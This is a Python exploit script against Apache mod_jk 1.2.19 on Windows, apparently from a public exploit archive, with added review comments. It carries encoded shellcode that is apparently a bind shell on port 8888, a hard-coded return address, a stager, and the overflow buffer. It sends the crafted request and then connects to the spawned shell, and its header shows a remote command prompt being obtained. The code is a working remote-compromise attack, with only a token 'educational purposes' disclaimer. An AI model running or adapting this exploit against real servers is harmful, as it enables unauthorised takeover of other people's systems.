Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)


#!/usr/bin/python

#

# _____ _ _ _____ _____ _____ _____

# / ___| |_| | _ \\| _ | _ |_ _|

# | (___| _ | [_)_/| (_) | (_) | | |

# \\_____|_| |_|_| |_||_____|_____| |_|

# C. H. R. O. O. T. SECURITY GROUP

# – — —– — — — —- — — –

# http://www.chroot.org

#

# _ _ _ _____ ____ ____ __ _

# Hacks In Taiwan | |_| | |_ _| __| | \\| |

# Conference 2008 | _ | | | | | (__| () | |

# |_| |_|_| |_| \\____|____|_|\\__|

# http://www.hitcon.org

#

#

# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit

#

# Author ======:: unohope [at] chroot [dot] org

#

# IRC =========:: irc.chroot.org #chroot

#

# ScriptName ==:: Apache Module mod_jk/1.2.19

#

# Vendor ======:: http://tomcat.apache.org/

#

# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/

#

# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19

# Apache/2.0.59 (Win32) mod_jk/1.2.19

#

# Greets ======:: zha0

#

#

# [root@wargame tmp]# ./apx-jk_mod-1.2.19

# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)

#

# usage: ./apx-jk_mod-1.2.19 <host>

#

# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78

# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)

#

# [ ] connecting to 192.168.1.78 ...

#

# Trying 192.168.1.78...

# Connected to 192.168.1.78.

# Escape character is '^]'.

# Microsoft Windows XP [.. 5.1.2600]

# (C) Copyright 1985-2001 Microsoft Corp.

#

# C:\AppServ\Apache2>

#

#

import os, sys, time
import subprocess
from socket import *

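# Payload bytes. This is a Python 2 script, so these str literals are raw
# bytes. The first ten bytes (jmp +3 / pop ecx / jmp +5 / call -8) are a
# GetPC stub; the long run of \x49 followed by "7QZjhX0A1PBAkBAxB2BA2AA0AAX8BBPu"
# looks like a Metasploit alpha-mixed decoder stub in front of an encoded
# payload. NOTE(review): inferred from the byte pattern only; the only hard
# evidence of what it does is that xpl() telnets to port 8888 afterwards,
# i.e. it is presumably a bind shell on 8888.
shellcode = (
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
    "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
    "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
    "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
    "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
    "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
    "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
    "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
    "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
    "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
    "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
    "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
    "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
    "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
    "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
    "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
    "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
    "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
    "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
    "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
    "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
    "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
    "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
    "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
    "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
    "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
    "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
    "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
    "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
    "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
    "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
    "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
    "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
    "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
    "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
    "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
    "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
    "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
    "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
    "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
    "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
    "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
    "\x4f\x69\x46\x4b\x4f\x6e\x30\x68"
)

foo_base = 8               # NOP sled in front of the shellcode
buf_base = 4087            # bytes before the saved return address is reached
buf_offset = foo_base * 11  # 88: bytes reserved after the return address for the stager

nop = "\x90"

# Saved-EIP overwrite, little-endian 0x77d92acc. This is a hard-coded
# absolute address, so it is only valid for the Windows build the header says
# this was tested against (XP, Apache 2.0.58/2.0.59 + mod_jk 1.2.19). Any
# other target needs the address re-derived; nothing below checks the target
# version before sending.
ret = "\xcc\x2a\xd9\x77"

# Bytes executed after the return: mov al,0x53 ; imul eax,eax,0x28 ;
# add ebx,eax ; call ebx  -> transfers control 0x53*0x28 = 3320 bytes past
# whatever ebx holds. NOTE(review): this only works if ebx points into our
# buffer when the overwritten return address fires; that assumption is not
# visible here and should be confirmed on the target.
stager = "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3"

# Guard against silently mangling the layout: `nop * negative` yields "" in
# Python, so an oversized shellcode would shift ret without any error.
if len(shellcode) > buf_base - foo_base - buf_offset:
    raise ValueError("shellcode too long for the buffer layout")

# Layout: [8 NOPs][shellcode][NOP padding][ret][stager][NOP tail]
# Total length is always buf_base - buf_offset + 4 + buf_offset = 4091
# bytes, independent of the shellcode length.
sled = nop * foo_base
padding = nop * (buf_base - foo_base - len(shellcode) - buf_offset)
tail = nop * (buf_offset - foo_base - 3)
buf = sled + shellcode + padding + ret + stager + tail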

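def usage():
    """Print the command-line synopsis and exit with status -1.

    Raises SystemExit(-1); never returns. ``print`` is written in the
    parenthesised form so the file parses on both Python 2 and 3.
    """
    print('usage: %s <host>\n' % sys.argv[0])
    sys.exit(-1)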

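def xpl(target=None, port=80):
    """Send the overflow request, then attach to the shell it should spawn.

    The request line is ``GET /<buf>HTTP/1.0`` where ``buf`` is the
    module-level payload (NOP sled, shellcode, return address, stager); the
    overlong URI is presumably what triggers the mod_jk 1.2.19 overflow. After
    a three-second wait the script runs ``telnet <target> 8888``, so the
    shellcode is presumably a bind shell on 8888 (inferred from that call).

    target: host to attack. Defaults to the module-level ``host`` set in the
            ``__main__`` block, so the original ``xpl()`` call still works.
    port:   HTTP port of the vulnerable Apache (80 in the original).

    Socket errors are reported as ' [-] EXPLOIT FAILED!' rather than raised;
    the exception text is printed as well so a failure is diagnosable.
    """
    if target is None:
        target = host  # module-level global, assigned in __main__

    print(len(buf))  # kept from the original as a sanity check on the layout
    print(' [ ] connecting to %s ...\n' % target)
    try:
        s = socket(AF_INET, SOCK_STREAM)
        try:
            s.connect((target, port))
            # No space between the URI and "HTTP/1.0" in the original; kept
            # byte-for-byte because the crash offset was tuned against this
            # exact request. NOTE(review): confirm this is intentional.
            payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % target
            # sendall(): plain send() may write only part of a ~4 KiB request.
            s.sendall('GET /' + payload)
        finally:
            s.close()  # always release the socket, even on a failed connect
    except error as exc:
        print(' [-] EXPLOIT FAILED!\n')
        print(' [-] %s' % exc)
        return

    time.sleep(3)  # give the shellcode time to bind before we connect
    # argv list instead of os.system("telnet %s 8888" % host): the host string
    # never goes through a shell, so metacharacters in it cannot inject.
    try:
        subprocess.call(['telnet', target, '8888'])
    except OSError as exc:
        print(' [-] could not run telnet: %s' % exc)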

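if __name__ == '__main__':
    print('Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n')
    # Exactly one positional argument is required: the target host.
    # usage() exits, so nothing below runs without it.
    if len(sys.argv) < 2:
        usage()
    host = sys.argv[1]  # read by xpl() when called without an explicit target
    xpl()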

# [NOTE]

#

# !! This is for educational purposes only. DO NOT use it for illegal purposes. !!

#
